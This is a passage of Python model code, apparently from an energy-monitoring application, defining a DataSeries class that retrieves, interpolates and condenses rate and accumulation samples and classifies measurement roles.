'measurementpoints'\n\n _exclude_field_from_validation = []\n\n def __unicode__(self):\n if self.subclass.model_class() != self.__class__:\n # This operator is used for ModelChoiceFields, where the queryset\n # does not return concrete instances, but only raw DataSeries\n # instances. 
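Returning to the dependency graph described in the module docstring: a minimal sketch of a cycle-rejecting traversal over such dependencies, with a plain dict as a hypothetical stand-in for the depends_on() relation:

    def transitive_dependencies(series_id, graph):
        # graph maps each series id to the ids it is defined in terms of.
        seen, order = set(), []

        def visit(node, path):
            if node in path:
                # A node reachable from itself would be a circular
                # dependency, which the model forbids.
                raise ValueError('circular dependency via {!r}'.format(node))
            if node in seen:
                return
            seen.add(node)
            for dep in graph.get(node, ()):
                visit(dep, path | {node})
            order.append(node)

        visit(series_id, frozenset())
        return order[:-1]  # dependencies of series_id, dependencies first

    assert transitive_dependencies('a', {'a': ['b'], 'b': ['c'], 'c': []}) == ['c', 'b']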
If so, delegate to the subclass_instance.\n return unicode(self.subclass_instance)\n elif self.graph and self.graph.collection and self.customer:\n # This is the default implementation for all subclasses.\n return u'{collection_name} -- {role} ({unit})'.format(\n collection_name=self.graph.collection.name_plain,\n role=self.get_role_display(),\n unit=self.get_preferred_unit_converter().get_display_unit())\n else:\n return self.get_role_display()\n\n def get_encryption_id(self):\n return (Customer, self.customer_id)\n\n def get_samples(self, from_timestamp, to_timestamp):\n \"\"\"\n Yields (or returns a list of) raw samples covering the interval\n M{[C{from_timestamp}; C{to_timestamp}]}.\n\n Subclasses that don't store their data directly as StoredData should\n reimplement the C{_get_samples()} method.\n\n @precondition: C{from_timestamp <= to_timestamp}\n\n @postcondition: For rates, both end-points are included if possible\n through interpolation. If insufficient data is available, nothing is\n yielded/the empty list is returned.\n\n @postcondition: For accumulations, both end-points are included\n (possibly using interpolation or extrapolation). If insufficient data\n is available, nothing is yielded/the empty list is returned.\n\n @postcondition: All yielded samples are contained within the interval.\n\n @postcondition: Each sample yielded represents time after the previously\n yielded sample.\n\n @raise UndefinedSamples: If the subclass is not supposed to be defined for\n the particular combination of C{from_timestamp} and C{to_timestamp}.\n \"\"\"\n assert from_timestamp <= to_timestamp\n\n if self.get_underlying_function() == self.INTERVAL_FUNCTION:\n raise UndefinedSamples(\n 'Raw samples for interval functions are not well-defined.')\n\n first_sample = None\n final_sample = None\n previous_timestamp = None\n for sample in self.subclass_instance._get_samples(\n from_timestamp, to_timestamp):\n assert isinstance(sample, Sample), \\\n '%r is not an instance of Sample (self.__class__ == %s)' % (\n sample, self.__class__)\n if first_sample is None:\n first_sample = sample\n elif sample.is_point:\n assert previous_timestamp < sample.timestamp\n elif sample.is_range:\n assert previous_timestamp <= sample.from_timestamp\n\n final_sample = sample\n assert from_timestamp <= sample.from_timestamp, \\\n '%r > %r (self.__class__ == %s)' % (\n from_timestamp, sample.from_timestamp, self.__class__)\n assert to_timestamp >= sample.to_timestamp, \\\n '%r < %r (self.__class__ == %s)' % (\n to_timestamp, sample.to_timestamp, self.__class__)\n yield sample\n\n previous_timestamp = sample.to_timestamp\n\n if self.is_rate() and first_sample is not None and \\\n final_sample is not None:\n assert not first_sample.extrapolated, str(self.__class__)\n assert not final_sample.extrapolated, str(self.__class__)\n\n if self.is_accumulation():\n if first_sample is not None and final_sample is not None:\n assert first_sample.from_timestamp == from_timestamp, str(\n self.__class__)\n assert final_sample.to_timestamp == to_timestamp, str(\n self.__class__)\n\n def _get_samples(self, from_timestamp, to_timestamp):\n \"\"\"\n Yields (or returns a list of) raw samples covering the interval\n M{[C{from_timestamp}; C{to_timestamp}]}.\n\n Subclasses that don't store their data directly as StoredData should\n reimplement this method.\n\n @precondition: C{from_timestamp <= to_timestamp}\n\n @postcondition: For rates, both end-points are included if possible\n through interpolation. 
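These sampling postconditions can be restated as a tiny runnable checker; (start, end) tuples are a hypothetical stand-in for range Sample objects:

    def check_sample_stream(samples, from_ts, to_ts):
        # Every sample must lie inside [from_ts, to_ts], and time must
        # advance from one sample to the next.
        prev_end = None
        for start, end in samples:
            assert from_ts <= start <= end <= to_ts
            assert prev_end is None or start >= prev_end
            prev_end = end
            yield (start, end)

    assert list(check_sample_stream([(1, 2), (2, 4)], 0, 5)) == [(1, 2), (2, 4)]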
If insufficient data is available, nothing is\n yielded/the empty list is returned.\n\n @postcondition: For accumulations, both end-points are included\n (possibly using interpolation or extrapolation). If insufficient data\n is available, nothing is yielded/the empty list is returned.\n\n @postcondition: All yielded samples are contained within the interval.\n\n @note: The returned samples will be in the time interval\n M{[C{from_timestamp}, C{to_timestamp}]}, where C{from_timestamp} and\n C{to_timestamp} will be linear interpolation values if enough data is\n available.\n \"\"\"\n assert from_timestamp <= to_timestamp\n if self.__class__ != self.subclass.model_class():\n return self.subclass_instance.get_samples(\n from_timestamp, to_timestamp)\n\n tz = from_timestamp.tzinfo\n\n if self.is_continuous():\n dataset = list(self.stored_data.filter(\n timestamp__gte=from_timestamp,\n timestamp__lte=to_timestamp).\n order_by('timestamp'))\n\n result = [\n self.create_point_sample(\n data.timestamp,\n PhysicalQuantity(data.value, self.unit))\n for data in dataset]\n\n # result may be empty if nothing is found in range. Extrapolation\n # is necessary anyway.\n if result:\n if result[0].from_timestamp != from_timestamp:\n first_sample = self._interpolate_extrapolate_sample(\n from_timestamp, data_after=dataset[0])\n if self.is_accumulation() or not first_sample.extrapolated:\n result.insert(0, first_sample)\n if result[-1].to_timestamp != to_timestamp:\n end_sample = self._interpolate_extrapolate_sample(\n to_timestamp, data_before=dataset[-1])\n if self.is_accumulation() or not end_sample.extrapolated:\n result.append(end_sample)\n else:\n first_sample = self._interpolate_extrapolate_sample(\n from_timestamp)\n if first_sample is None or (self.is_rate() and\n first_sample.extrapolated):\n return []\n elif from_timestamp == to_timestamp:\n return [first_sample]\n else:\n end_sample = self._interpolate_extrapolate_sample(\n to_timestamp)\n return [first_sample, end_sample]\n\n # Check post-condition\n if self.is_accumulation():\n assert result == [] or \\\n result[0].from_timestamp == from_timestamp\n assert result == [] or result[-1].to_timestamp == to_timestamp\n\n return result\n else:\n result = []\n\n # RangeSamples are stored as (from_timestamp, value), with\n # to_timestamp being the timestamp of the next stored data.\n # Therefore we need to consider the most recent StoredData before\n # the (from_timestamp, to_timestamp) range.\n try:\n first_sample = [\n self.stored_data.filter(timestamp__lte=from_timestamp).\n order_by('-timestamp').\n values_list('timestamp', 'value')[0]]\n except IndexError:\n first_sample = []\n\n stored_data = first_sample + \\\n list(self.stored_data.filter(\n timestamp__gt=from_timestamp,\n timestamp__lt=to_timestamp).\n order_by('timestamp').\n values_list('timestamp', 'value'))\n\n for current_data, next_data in pairwise_extended(stored_data):\n if next_data:\n assert current_data[0] < next_data[0], \\\n 'unexpected range for sample (%r < %r)' % \\\n (current_data[0], next_data[0])\n result.append(\n self.create_range_sample(\n tz.normalize(\n max(from_timestamp,\n current_data[0]).astimezone(tz)),\n tz.normalize(next_data[0]).astimezone(tz),\n PhysicalQuantity(current_data[1], self.unit)))\n else:\n assert current_data[0] < to_timestamp\n result.append(\n self.create_range_sample(\n tz.normalize(\n max(from_timestamp,\n current_data[0])).astimezone(tz),\n tz.normalize(to_timestamp).astimezone(tz),\n PhysicalQuantity(current_data[1], self.unit)))\n\n # Check 
post-condition\n assert result[-1].from_timestamp >= from_timestamp\n assert result[-1].to_timestamp <= to_timestamp\n\n # Check post-condition\n if self.is_accumulation():\n assert result == [] or \\\n result[0].from_timestamp == from_timestamp\n assert result == [] or result[-1].to_timestamp == to_timestamp\n\n return result\n\n def get_condensed_samples(\n self, from_timestamp, sample_resolution, to_timestamp):\n \"\"\"\n Get list of L{Sample}s defined by this C{DataSeries}.\n\n If the underlying function is a continuous rate, the\n samples will have a given symbolic timespan distance.\n Otherwise the samples will cover intervals with the given\n symbolic timespan (not quite the same).\n\n @param from_timestamp: The earliest time used in the returned samples.\n\n @param sample_resolution: A L{RelativeTimeDelta} that defines the sample\n resolution.\n\n @param to_timestamp: The final time included in the samples.\n\n @return: Returns a list of point L{Sample}s if the underlying function\n is a continuous rate. Otherwise a list of ranged L{Sample}s is\n returned.\n\n @see: L{_get_condensed_samples}.\n\n @precondition: C{from_timestamp == condense.floor(\n from_timestamp, sample_resolution, from_timestamp.tzinfo)}\n\n @precondition: C{to_timestamp == condense.floor(\n to_timestamp, sample_resolution, to_timestamp.tzinfo)}\n\n @precondition: C{from_timestamp.tzinfo is not None}\n\n @precondition: C{to_timestamp.tzinfo is not None}\n\n @precondition: C{sample_resolution in condense.RESOLUTIONS}\n \"\"\"\n assert from_timestamp.tzinfo is not None\n assert to_timestamp.tzinfo is not None\n timezone = from_timestamp.tzinfo\n\n assert from_timestamp == condense.floor(\n from_timestamp, sample_resolution, timezone), \\\n 'from_timestamp=%r != ' \\\n 'floor(from_timestamp, sample_resolution=%r, timezone=%r)=%r' % (\n from_timestamp, sample_resolution, timezone, condense.floor(\n from_timestamp, sample_resolution, timezone))\n\n assert to_timestamp == condense.floor(\n to_timestamp, sample_resolution, timezone)\n\n assert sample_resolution in condense.RESOLUTIONS\n\n for sample in self.subclass_instance._get_condensed_samples(\n from_timestamp, sample_resolution, to_timestamp):\n assert from_timestamp <= sample.from_timestamp, \\\n 'error in %s: from_timestamp = %r > sample.from_timestamp = %r ' \\\n '(sample resolution = %s)' % (\n self.subclass_instance.__class__,\n from_timestamp, sample.from_timestamp, sample_resolution)\n\n assert sample.to_timestamp <= to_timestamp\n yield sample\n\n def _get_condensed_samples(\n self, from_timestamp, sample_resolution, to_timestamp):\n data_samples = self._condense_data_samples_recursive(\n from_timestamp, sample_resolution, to_timestamp=to_timestamp)\n next_timestamp = from_timestamp\n for sample_a, sample_b in pairwise_extended(data_samples):\n if sample_b is None:\n yield sample_a\n else:\n while next_timestamp < sample_a.from_timestamp:\n next_timestamp += sample_resolution\n while sample_a.from_timestamp <= next_timestamp < \\\n sample_b.from_timestamp:\n if sample_a.from_timestamp == next_timestamp:\n yield sample_a\n elif sample_a.is_point and sample_b.is_point:\n yield self._interpolate_extrapolate_sample(\n next_timestamp, sample_a, sample_b)\n next_timestamp += sample_resolution\n\n def _condense_accumulation_data_samples(\n self, from_timestamp, sample_resolution, to_timestamp):\n \"\"\"\n Condense accumulation data samples within an interval defined by\n M{[C{from_timestamp}; C{to_timestamp}]}, with C{sample_resolution} as the\n given resolution.\n\n 
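The condense.floor() preconditions in get_condensed_samples() above simply require both period endpoints to sit on resolution boundaries. A simplified sketch with a fixed one-hour resolution and naive datetimes (the real condense.floor() is timezone- and resolution-aware):

    import datetime

    def floor_hour(ts):
        # Round a timestamp down to the enclosing whole hour.
        return ts.replace(minute=0, second=0, microsecond=0)

    t = datetime.datetime(2014, 1, 1, 12, 34, 56)
    assert floor_hour(t) == datetime.datetime(2014, 1, 1, 12)
    assert floor_hour(floor_hour(t)) == floor_hour(t)  # flooring is idempotent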
Yields condensed range samples.\n \"\"\"\n def resolution_aligned_acc():\n # convert the sequence of \"raw\" samples from\n # get_samples() to a sequence of samples aligned to\n # the requested sample_resolution\n raw_accumulation = \\\n self.get_samples(from_timestamp, to_timestamp)\n next_timestamp = from_timestamp\n for sample1, sample2 in pairwise(raw_accumulation):\n while sample1.timestamp <= next_timestamp <= \\\n sample2.timestamp:\n yield self._interpolate_extrapolate_sample(\n next_timestamp,\n data_before=sample1, data_after=sample2)\n next_timestamp += sample_resolution\n\n for range_begin, range_end in pairwise(\n resolution_aligned_acc()):\n assert range_begin.timestamp >= from_timestamp\n assert range_end.timestamp <= to_timestamp\n yield self.create_range_sample(\n range_begin.timestamp,\n range_end.timestamp,\n range_end.physical_quantity -\n range_begin.physical_quantity,\n uncachable=(range_begin.uncachable or\n range_end.uncachable),\n extrapolated=(range_begin.extrapolated or\n range_end.extrapolated))\n\n def _condense_rate_data_samples(\n self, from_timestamp, sample_resolution, to_timestamp):\n \"\"\"\n Rate specific L{get_condensed_samples()} implementation.\n Arguments are the same (or left out).\n\n Splits the multiframe ranged rate sample into smaller ranged rate\n samples (C{sample_slices}) that fit inside each requested sample frame.\n While this is visually redundant, it supports caching performance (or\n at least is intended to).\n\n @return: Returns a list of samples. For each frame (of length\n C{sample_resolution}) the minimum and maximum samples are included in\n the result.\n\n @postcondition: The samples in the returned list are ordered by their\n timestamps.\n\n @precondition: C{self.is_rate()} returns C{True}.\n \"\"\"\n assert self.is_rate()\n\n raw_data_samples = list(self.get_samples(from_timestamp, to_timestamp))\n\n if not raw_data_samples:\n # short-circuit: absolutely no values in this data series.\n return []\n\n result = []\n next_time = from_timestamp + sample_resolution\n minimum_sample = None\n maximum_sample = None\n\n def flush_min_max():\n if minimum_sample is not None and maximum_sample is not None:\n if minimum_sample.to_timestamp < maximum_sample.to_timestamp:\n result.extend([minimum_sample, maximum_sample])\n elif minimum_sample == maximum_sample:\n result.append(minimum_sample)\n else:\n assert minimum_sample.to_timestamp > \\\n maximum_sample.to_timestamp\n result.extend([maximum_sample, minimum_sample])\n return (None, None)\n return (minimum_sample, maximum_sample)\n\n def update_min_max():\n # work-around while we wait for 'nonlocal' Python 3 keyword\n r1 = minimum_sample\n r2 = maximum_sample\n if minimum_sample is None or \\\n minimum_sample.physical_quantity > \\\n sample.physical_quantity:\n r1 = sample\n if maximum_sample is None or \\\n maximum_sample.physical_quantity < \\\n sample.physical_quantity:\n r2 = sample\n return (r1, r2)\n\n for sample in raw_data_samples:\n if sample.uncachable:\n # don't condense using uncachable samples (end-points are\n # included after this loop).\n continue\n\n flush = False\n sample_slices = []\n\n if sample.is_range and \\\n sample.from_timestamp < next_time and\\\n sample.to_timestamp > next_time:\n sample_slices.append(sample._replace(to_timestamp=next_time))\n\n while sample.to_timestamp > next_time:\n flush = True\n if sample.is_range and not sample.in_closed_interval(\n next_time, next_time + sample_resolution) and \\\n sample.from_timestamp < next_time + sample_resolution:\n 
assert max(next_time, sample.from_timestamp) < min(\n next_time + sample_resolution, sample.to_timestamp), \\\n 'next_time=%r, sample=%r, sample_resolution=%r' % (\n next_time, sample, sample_resolution)\n sample_slices.append(sample._replace(\n from_timestamp=max(next_time, sample.from_timestamp),\n to_timestamp=min(\n next_time + sample_resolution,\n sample.to_timestamp)))\n next_time += sample_resolution\n\n if sample_slices:\n assert len(sample_slices) >= 2\n assert flush\n sample = sample_slices[0]\n minimum_sample, maximum_sample = update_min_max()\n minimum_sample, maximum_sample = flush_min_max()\n result.extend(sample_slices[1:-1])\n sample = sample_slices[-1]\n elif flush:\n minimum_sample, maximum_sample = flush_min_max()\n\n minimum_sample, maximum_sample = update_min_max()\n\n minimum_sample, maximum_sample = flush_min_max()\n\n return result\n\n def get_recursive_condense_resolution(self, resolution):\n \"\"\"\n Get the recursive condense resolution for the given C{resolution}.\n\n @return: A resolution to be used for condensing C{resolution}\n recursively or C{None}. If C{None} is returned, condensation for the\n given resolution will not be calculated recursively.\n\n This method is abstract so subclasses must implement it. The following\n implementation would work for most DataSeries specializations. However\n it would often be very inefficient for small condense resolutions,\n which is why it is not the default::\n\n def get_recursive_condense_resolution(self, resolution):\n return condense.next_resolution(resolution)\n\n @see: L{condense.next_resolution()}\n \"\"\"\n raise NotImplementedError(\n \"%s didn't implement this method\" % self.__class__)\n\n def _condense_data_samples_recursive(\n self, from_timestamp, sample_resolution, to_timestamp):\n \"\"\"\n Method with similar arguments and result as\n L{get_condensed_samples()}, but intended for being implemented in\n L{DataSeries} specializations that wish to utilize the implicit caching\n implemented in L{DataSeries.get_condensed_samples()}.\n\n Not intended to be called from outside\n L{DataSeries.get_condensed_samples()}, except for testing of the\n concrete C{_condense_data_samples_recursive()} implementation.\n \"\"\"\n timezone = from_timestamp.tzinfo\n assert from_timestamp == condense.floor(\n from_timestamp, sample_resolution, timezone)\n to_timestamp = condense.floor(\n to_timestamp, sample_resolution, timezone)\n\n refined_resolution = self.get_recursive_condense_resolution(\n sample_resolution)\n\n if refined_resolution is None:\n if self.is_accumulation():\n condensed_samples = self._condense_accumulation_data_samples(\n from_timestamp, sample_resolution, to_timestamp)\n else:\n assert self.is_rate()\n condensed_samples = self._condense_rate_data_samples(\n from_timestamp, sample_resolution, to_timestamp)\n\n for sample in condensed_samples:\n yield sample\n else:\n if self.is_accumulation():\n def extract_target_from_time(sample):\n return condense.floor(\n sample.from_timestamp, sample_resolution, timezone)\n\n for current_from_time, current_samples in itertools.groupby(\n self.get_condensed_samples(\n from_timestamp, refined_resolution, to_timestamp),\n key=extract_target_from_time):\n current_to_time = current_from_time + sample_resolution\n assert current_from_time >= from_timestamp\n assert current_to_time <= to_timestamp\n\n for condensed_sample in self.condense_accumulation(\n current_from_time,\n current_to_time,\n list(current_samples)):\n yield condensed_sample\n\n else:\n assert 
self.is_rate()\n\n condensed_samples = list(\n self.get_condensed_samples(\n from_timestamp, refined_resolution, to_timestamp))\n\n for frame_start, frame_end in pairwise(\n count_extended(from_timestamp, sample_resolution)):\n\n if frame_start == to_timestamp:\n break\n\n for condensed_sample in self.condense_rate(\n list(\n itertools.takewhile(\n lambda s: s.to_timestamp <= frame_end,\n condensed_samples))):\n yield condensed_sample\n\n condensed_samples = list(\n itertools.dropwhile(\n lambda s: s.to_timestamp < frame_end,\n condensed_samples))\n\n CONTINUOUS_ACCUMULATION_ROLES = (\n DataRoleField.CONSUMPTION,\n DataRoleField.CO2,\n DataRoleField.COST,\n DataRoleField.MASS,\n DataRoleField.TIME,\n DataRoleField.STANDARD_HEATING_DEGREE_DAYS,\n DataRoleField.HEATING_DEGREE_DAYS,\n DataRoleField.HEATING_DEGREE_DAYS_CORRECTED_CONSUMPTION,\n DataRoleField.VOLUME,\n DataRoleField.ENERGY_DRIVER,\n DataRoleField.PRODUCTION,\n DataRoleField.REACTIVE_ENERGY,\n )\n\n PIECEWISE_CONSTANT_ACCUMULATION_ROLES = ()\n\n ACCUMULATION_ROLES = CONTINUOUS_ACCUMULATION_ROLES + \\\n PIECEWISE_CONSTANT_ACCUMULATION_ROLES\n\n PIECEWISE_CONSTANT_RATE_ROLES = (\n DataRoleField.STATE,\n DataRoleField.HEAT_TARIFF,\n DataRoleField.GAS_TARIFF,\n DataRoleField.ELECTRICITY_TARIFF,\n DataRoleField.WATER_TARIFF,\n DataRoleField.OIL_TARIFF,\n DataRoleField.CO2_QUOTIENT,\n DataRoleField.EMPLOYEES,\n DataRoleField.AREA,\n DataRoleField.HIDDEN_ELECTRICITY_TARIFF,\n DataRoleField.HIDDEN_GAS_TARIFF,\n DataRoleField.HIDDEN_HEAT_TARIFF,\n DataRoleField.HIDDEN_WATER_TARIFF,\n DataRoleField.HIDDEN_OIL_TARIFF,\n )\n\n CONTINUOUS_RATE_ROLES = (\n DataRoleField.POWER,\n DataRoleField.REACTIVE_POWER,\n DataRoleField.POWER_FACTOR,\n DataRoleField.ABSOLUTE_TEMPERATURE,\n DataRoleField.RELATIVE_TEMPERATURE,\n DataRoleField.VOLUME_FLOW,\n DataRoleField.VOLTAGE,\n DataRoleField.CURRENT,\n DataRoleField.FREQUENCY,\n DataRoleField.PRESSURE,\n DataRoleField.LINEAR_REGRESSION,\n DataRoleField.EFFICIENCY,\n )\n\n RATE_ROLES = PIECEWISE_CONSTANT_RATE_ROLES + CONTINUOUS_RATE_ROLES\n\n INTERVAL_FUNCTION_ROLES = (\n DataRoleField.MEAN_COOLDOWN_TEMPERATURE,\n DataRoleField.CONSUMPTION_UTILIZATION_EMPLOYEES,\n DataRoleField.CONSUMPTION_UTILIZATION_AREA,\n DataRoleField.PRODUCTION_ENPI,\n DataRoleField.HEAT_LOSS_COEFFICIENT,\n )\n\n HIDDEN_ROLES = (\n DataRoleField.HIDDEN_ELECTRICITY_TARIFF,\n DataRoleField.HIDDEN_GAS_TARIFF,\n DataRoleField.HIDDEN_HEAT_TARIFF,\n DataRoleField.HIDDEN_WATER_TARIFF,\n DataRoleField.HIDDEN_OIL_TARIFF,\n DataRoleField.HIDDEN,\n )\n\n def get_underlying_function(self):\n \"\"\"\n Method for retrieving a description of the underlying function of the\n samples kept in this C{DataSeries}.\n\n @return: One of C{UNDERLYING_FUNCTION_CHOICES}.\n\n @note: It is always more efficient to check for role inclusion in the\n relevant constant list. 
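The role-set membership check recommended in the @note above looks like this in isolation; the string roles are hypothetical stand-ins for the DataRoleField constants used by get_underlying_function() below:

    CONTINUOUS_ACCUMULATION_ROLES = frozenset(['consumption', 'cost'])
    CONTINUOUS_RATE_ROLES = frozenset(['power', 'absolute_temperature'])

    def underlying_function(role):
        # Same dispatch shape as get_underlying_function(): classify a
        # role by membership in the constant role sets.
        if role in CONTINUOUS_ACCUMULATION_ROLES:
            return 'continuous accumulation'
        if role in CONTINUOUS_RATE_ROLES:
            return 'continuous rate'
        raise AssertionError('underlying function for {!r} is undefined'.format(role))

    assert underlying_function('power') == 'continuous rate'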
This is useful to know when querying for a\n particular kind of underlying function.\n\n @bug: May run C{clean()}, though this method returns a result and therefore\n should not be expected to have destructive side-effects.\n \"\"\"\n if self.role is None:\n self.clean()\n\n assert self.role is not None\n if self.role in self.CONTINUOUS_ACCUMULATION_ROLES:\n return self.CONTINUOUS_ACCUMULATION\n elif self.role in self.PIECEWISE_CONSTANT_RATE_ROLES:\n return self.PIECEWISE_CONSTANT_RATE\n elif self.role in self.CONTINUOUS_RATE_ROLES:\n return self.CONTINUOUS_RATE\n elif self.role in self.PIECEWISE_CONSTANT_ACCUMULATION_ROLES:\n return self.PIECEWISE_CONSTANT_ACCUMULATION\n elif self.role in self.INTERVAL_FUNCTION_ROLES:\n return self.INTERVAL_FUNCTION\n\n assert False, \"Underlying function for %d is undefined\" % self.role\n\n def is_rate(self):\n \"\"\"\n Check if this C{DataSeries} is a rate.\n\n @return: Returns C{True} if this C{DataSeries} is a rate.\n \"\"\"\n return self.get_underlying_function() in [self.CONTINUOUS_RATE,\n self.PIECEWISE_CONSTANT_RATE]\n\n def is_accumulation(self):\n \"\"\"\n Check if this C{DataSeries} is an accumulation.\n\n @return: Returns C{True} if this C{DataSeries} is an\n accumulation. C{False} otherwise.\n \"\"\"\n return self.get_underlying_function() in [\n self.CONTINUOUS_ACCUMULATION, self.PIECEWISE_CONSTANT_ACCUMULATION]\n\n def is_continuous(self):\n \"\"\"\n Check if this C{DataSeries} is continuous.\n \"\"\"\n return self.get_underlying_function() in [\n self.CONTINUOUS_ACCUMULATION,\n self.CONTINUOUS_RATE]\n\n def is_piecewise_constant(self):\n \"\"\"\n Check if this C{DataSeries} has a piecewise constant underlying\n function.\n\n @return: Returns C{True} if this C{DataSeries} is piecewise constant,\n C{False} otherwise.\n \"\"\"\n\n return self.get_underlying_function() in [\n self.PIECEWISE_CONSTANT_RATE, self.PIECEWISE_CONSTANT_ACCUMULATION]\n\n def is_tariff(self):\n \"\"\"\n Check if this C{DataSeries} is a tariff.\n\n @return: Returns C{True} if this C{DataSeries} is a tariff, C{False}\n otherwise.\n \"\"\"\n return self.role in DataRoleField.TARIFFS\n\n def _interpolate_extrapolate_sample(self, timestamp,\n data_before=None, data_after=None):\n \"\"\"\n Get a potentially extrapolated or linearly interpolated sample at the given\n C{timestamp}.\n\n @keyword data_before: A StoredData or point Sample before C{timestamp}.\n If C{None}, a query will be made to construct a C{data_before}.\n\n @keyword data_after: A StoredData or point Sample after C{timestamp}.\n If C{None}, a query will be made to construct a C{data_after}.\n\n @return: If a sample at the exact timestamp requested is found, it is\n returned. If samples on both sides of the timestamp requested are\n found, an interpolated value is computed and returned. If samples on\n only one side are available, the value from the closest sample is used\n and returned (uncachable and extrapolated). If no samples are\n available, neither before nor after the requested timestamp, None is\n returned.\n\n @note: The interpolation used is linear for continuous underlying\n functions, and trivial for piecewise constant underlying functions.\n\n @note: Extrapolation used is always trivial, i.e. 
extending with copy\n of end-point value.\n\n @note: This method is only intended for use with C{DataSeries} that\n actually store their data as L{StoredData}, unless both C{data_before}\n and C{data_after} are given.\n \"\"\"\n if data_before is not None:\n if isinstance(data_before, StoredData):\n data_before = self.create_point_sample(\n data_before.timestamp,\n PhysicalQuantity(data_before.value, self.unit))\n assert isinstance(data_before, Sample)\n assert data_before.timestamp <= timestamp\n\n if data_after is not None:\n if isinstance(data_after, StoredData):\n data_after = self.create_point_sample(\n data_after.timestamp,\n PhysicalQuantity(data_after.value, self.unit))\n assert isinstance(data_after, Sample)\n assert data_after.timestamp >= timestamp\n\n if self.is_continuous():\n try:\n if data_before is None:\n stored_data_before = self.stored_data.filter(\n timestamp__lte=timestamp).order_by('-timestamp')[0]\n data_before = self.create_point_sample(\n stored_data_before.timestamp,\n PhysicalQuantity(stored_data_before.value, self.unit))\n # short circuit; if \"before\" matches timestamp exactly, return\n # that.\n if data_before.timestamp == timestamp:\n assert isinstance(data_before, Sample)\n return data_before\n except IndexError:\n data_before = None\n try:\n if data_after is None:\n stored_data_after = self.stored_data.filter(\n timestamp__gte=timestamp).order_by('timestamp')[0]\n data_after = self.create_point_sample(\n stored_data_after.timestamp,\n PhysicalQuantity(stored_data_after.value, self.unit))\n # short circuit; if \"after\" matches timestamp exactly, return\n # that\n if data_after.timestamp == timestamp:\n assert isinstance(data_after, Sample)\n return data_after\n except IndexError:\n data_after = None\n if data_before is not None and data_after is not None:\n assert data_before.timestamp < data_after.timestamp\n timespan_total = (data_after.timestamp -\n data_before.timestamp).total_seconds()\n timespan_before = (timestamp -\n data_before.timestamp).total_seconds()\n delta_value = data_after.physical_quantity - \\\n data_before.physical_quantity\n rate = delta_value / Fraction(timespan_total)\n val = data_before.physical_quantity + rate * \\\n Fraction(timespan_before)\n\n # interpolate\n return self.create_point_sample(\n timestamp, val,\n uncachable=data_before.uncachable or data_after.uncachable,\n extrapolated=data_before.extrapolated or\n data_after.extrapolated)\n\n elif data_before is not None:\n assert data_after is None\n # extrapolate\n return self.create_point_sample(\n timestamp, data_before.physical_quantity,\n uncachable=True, extrapolated=True)\n elif data_after is not None:\n assert data_before is None\n # extrapolate\n return self.create_point_sample(\n timestamp,\n data_after.physical_quantity,\n uncachable=True, extrapolated=True)\n else:\n assert data_before is None and data_after is None\n return None\n\n else:\n assert self.is_piecewise_constant()\n try:\n if data_before is None:\n stored_data_before = self.stored_data.filter(\n timestamp__lte=timestamp).order_by('-timestamp')[0]\n data_before = self.create_point_sample(\n stored_data_before.timestamp,\n PhysicalQuantity(stored_data_before.value, self.unit))\n # short circuit; if \"before\" matches timestamp exactly, return\n # that\n if data_before.timestamp == timestamp:\n assert isinstance(data_before, Sample)\n return data_before\n uncachable = extrapolated = not (\n data_after is not None and\n self.stored_data.filter(timestamp__gt=timestamp).exists())\n return 
self.create_point_sample(\n timestamp, PhysicalQuantity(data_before.value, self.unit),\n uncachable=uncachable, extrapolated=extrapolated)\n except IndexError:\n try:\n if data_after is None:\n data_after = self.stored_data.filter(\n timestamp__gt=timestamp).order_by('timestamp')[0]\n return self.create_point_sample(\n timestamp,\n PhysicalQuantity(data_after.value, self.unit),\n uncachable=True, extrapolated=True)\n except IndexError:\n return None\n\n def calculate_development(self, from_timestamp, to_timestamp):\n \"\"\"\n Calculate the development between two points in time. Extrapolates if\n not enough data is available.\n\n @param from_timestamp: The first timestamp.\n\n @param to_timestamp: The last timestamp.\n\n @return: Return a L{Range} sample holding the development between\n C{from_timestamp} and C{to_timestamp}. If no data was available at\n all, None is returned.\n\n @postcondition: If C{None} is returned, the domain of this\n C{DataSeries} is empty.\n \"\"\"\n assert self.is_accumulation()\n\n try:\n from_sample = next(iter(\n self.get_samples(from_timestamp, from_timestamp)))\n to_sample = next(iter(\n self.get_samples(to_timestamp, to_timestamp)))\n\n return self.create_range_sample(\n from_timestamp, to_timestamp,\n to_sample.physical_quantity - from_sample.physical_quantity,\n uncachable=(\n from_sample.uncachable or\n to_sample.uncachable),\n extrapolated=(\n from_sample.extrapolated or\n to_sample.extrapolated))\n except StopIteration:\n return None\n\n def depends_on(self):\n \"\"\"\n Recursively collects a list of C{DataSeries} that this C{DataSeries}\n depends on.\n\n @see L{dataseries}\n\n @return: A list of L{DataSeries} that this C{DataSeries} depends upon.\n \"\"\"\n return []\n\n def latest_sample(self, from_timestamp, to_timestamp):\n \"\"\"\n The latest sample in the given time interval, M{[C{from_timestamp},\n C{to_timestamp})} for this C{DataSeries}.\n\n @precondition: C{self.is_rate()}.\n\n @return: Return a L{PointSample} or L{PointSampleCurrency} if samples\n are available in the given time interval, or C{None} if no sample is\n available.\n \"\"\"\n assert self.is_rate()\n raw_data = self.get_samples(from_timestamp, to_timestamp)\n\n for sample in reversed(list(raw_data)):\n if sample.cachable:\n return sample\n\n return None\n\n def aggregated_samples(self, from_timestamp, to_timestamp):\n \"\"\"\n The average sample, minimum sample and maximum sample of the given time\n interval, M{[C{from_timestamp}, C{to_timestamp}]}\n\n @precondition: C{self.is_rate()}\n\n @return: A triple C{(avg, min, max)}, where:\n\n - C{avg} is a L{RangeSample} or a L{RangeSampleCurrency} holding the\n average value of the given timespan. If insufficient values were\n available to interpolate at the end-points, the returned C{avg}\n may indicate a subinterval of the given time interval. If there are\n insufficient values for calculating an average in the given time\n interval, C{avg} is C{None}.\n\n - C{min, max} are L{PointSample}s or L{PointSampleCurrency}s holding\n the minimum and maximum value in the given timespan. If it is not\n even possible to interpolate a single value in the timespan, C{min,\n max} will be C{None, None}. 
